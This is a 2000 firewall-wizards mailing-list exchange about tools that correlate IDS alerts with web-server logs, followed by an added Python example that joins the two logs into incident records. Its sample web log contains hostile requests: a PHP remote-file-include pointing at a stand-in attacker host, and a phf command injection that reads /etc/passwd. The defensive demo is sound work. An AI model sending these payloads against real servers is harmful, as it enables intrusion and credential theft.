RE: Tools to correlate attacks b/w diff. logs
Subject: RE: Tools to correlate attacks b/w diff. logs
From: Shaun Moran (Shaun@TheMorans.Com)
Date: Thu Jan 13 2000 - 08:18:24 CST
- Next message: wwebb@adni.net: "Blocking ICMP with ipchains"
- Previous message: VN_Sabarinath@satyam-infoway.com: "Firewall Log Analysis"
- In reply to: Pete Storm: "Tools to correlate attacks b/w diff. logs"
- Next in thread: R. DuFresne: "Re: Tools to correlate attacks b/w diff. logs"
- Reply: Shaun Moran: "RE: Tools to correlate attacks b/w diff. logs"
I'm pretty sure the ISS Decisions server will correlate entries from multiple
sources including all ISS products (host/network IDS),
system/network/database scanners and CheckPoint Firewall-1 logs.
Sticks it all in an SQL database and generates reports/alarms from that.
Shaun
Who doesn't work for ISS - just uses their products.
-----Original Message-----
From: owner-firewall-wizards@lists.nfr.net [mailto:owner-firewall-wizards@lists.nfr.net] On Behalf Of Pete Storm
Sent: Wednesday, 12 January 2000 6:18 AM
To: firewall-wizards@nfr.net
Subject: Tools to correlate attacks b/w diff. logs
Hi all,
Does anyone know of a tool out there that will allow
me to correlate incidents between several different
logs? For example, if I see an attempt to pull off a
php exploit on my IDS it stands to reason that I'll
see a similar log entry on my web server. What I'm
looking for is something that will pull these two
records out of the individual logs and place them in
an "incident" log as a related event.
The current problem is that we're talking about
hundreds of thousands of log entries. Suppose I could
Perl it, but I was kinda hoping there might be a
commercial/shareware tool out there already that could
do it so much better than I could.
thanks,
phs
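Pete's question above describes the correlation he is after: an IDS alert and the web-server log entry for the same request pulled out of their separate logs and written together as one "incident". The following is an added example, not code from this thread or from any product mentioned in it. It assumes a hypothetical one-line IDS alert format ("date time src_ip dst_ip signature"), Apache common log format for the web server, and that both logs are stamped from the same synchronized clock; the sample log lines are constructed for the example. Events are joined on the alert's source IP and a time window around the alert.

```python
"""Correlate IDS alerts with web-server log entries into incident records.

Added example for the firewall-wizards thread above; not from any product.
Assumptions (all hypothetical):
  - IDS alerts are lines of the form "YYYY-MM-DD HH:MM:SS src_ip dst_ip signature"
  - the web server writes Apache common log format
  - both logs share one synchronized local clock (tz offset is ignored)
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime

# A web request this many seconds either side of an alert is treated as related.
WINDOW_SECONDS = 30

# Constructed sample IDS alerts (hypothetical format, not a real product's).
IDS_LOG = """\
2000-01-12 06:15:02 10.1.2.3 192.168.0.10 WEB-PHP remote file include attempt
2000-01-12 06:15:40 10.1.2.3 192.168.0.10 WEB-CGI phf access
2000-01-12 07:00:00 10.9.9.9 192.168.0.10 ICMP PING NMAP
"""

# Constructed sample Apache common-log-format lines.
WEB_LOG = """\
10.1.2.3 - - [12/Jan/2000:06:15:03 -0600] "GET /index.php?page=http://evil.example/x.txt HTTP/1.0" 200 512
10.5.5.5 - - [12/Jan/2000:06:15:10 -0600] "GET /index.html HTTP/1.0" 200 1024
10.1.2.3 - - [12/Jan/2000:06:15:41 -0600] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 233
10.1.2.3 - - [12/Jan/2000:09:00:00 -0600] "GET /index.html HTTP/1.0" 200 1024
"""

IDS_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (.+)$")
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')


@dataclass
class Event:
    source: str        # "ids" or "web"
    ts: datetime
    src_ip: str        # attacker / client address, the correlation key
    detail: str        # signature name, or request line and status


@dataclass
class Incident:
    src_ip: str
    alert: Event                              # the IDS alert that opened the incident
    related: list = field(default_factory=list)  # web requests tied to it


def parse_ids(text):
    """Parse the hypothetical IDS alert format into Event objects."""
    events = []
    for line in text.splitlines():
        m = IDS_RE.match(line)
        if not m:
            continue  # skip lines that do not match; a real tool would count these
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append(Event("ids", ts, m.group(2), m.group(4)))
    return events


def parse_web(text):
    """Parse Apache common log format into Event objects."""
    events = []
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        stamp = m.group(2).split()[0]  # drop the tz offset: same clock assumed
        ts = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S")
        events.append(Event("web", ts, m.group(1), f"{m.group(3)} -> {m.group(4)}"))
    return events


def correlate(ids_events, web_events, window=WINDOW_SECONDS):
    """For each alert, attach web requests from the same client within +/- window seconds.

    Web events are indexed by client IP first so each alert only scans that
    client's requests, not the whole web log.
    """
    by_ip = defaultdict(list)
    for ev in web_events:
        by_ip[ev.src_ip].append(ev)
    incidents = []
    for alert in ids_events:
        related = [w for w in by_ip.get(alert.src_ip, [])
                   if abs((w.ts - alert.ts).total_seconds()) <= window]
        if related:  # alerts with no matching web request go to the normal IDS queue
            incidents.append(Incident(alert.src_ip, alert, sorted(related, key=lambda e: e.ts)))
    return incidents


def build_incident_log(ids_text=IDS_LOG, web_text=WEB_LOG, window=WINDOW_SECONDS):
    return correlate(parse_ids(ids_text), parse_web(web_text), window)


def format_incident(inc):
    lines = [f'INCIDENT src={inc.src_ip} alert="{inc.alert.detail}" at {inc.alert.ts:%Y-%m-%d %H:%M:%S}']
    lines += [f"  web {w.ts:%H:%M:%S} {w.detail}" for w in inc.related]
    return "\n".join(lines)


if __name__ == "__main__":
    for inc in build_incident_log():
        print(format_incident(inc))
```

With the constructed input, the two alerts from 10.1.2.3 each pick up the one request that arrived within a second of them, and the 09:00 request from the same host is left out because it is well outside the window; the NMAP ping from 10.9.9.9 has no web request and produces no incident. Two caveats apply to anything built on this: the correlation key is the source IP, which stops working behind a NAT or proxy (every client shares one address), and the time-window join is only as good as the clock agreement between the sensor and the web server, so both hosts need NTP before the output can be trusted.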
This archive was generated by hypermail 2b27 : Fri Jan 14 2000 - 04:05:28 CST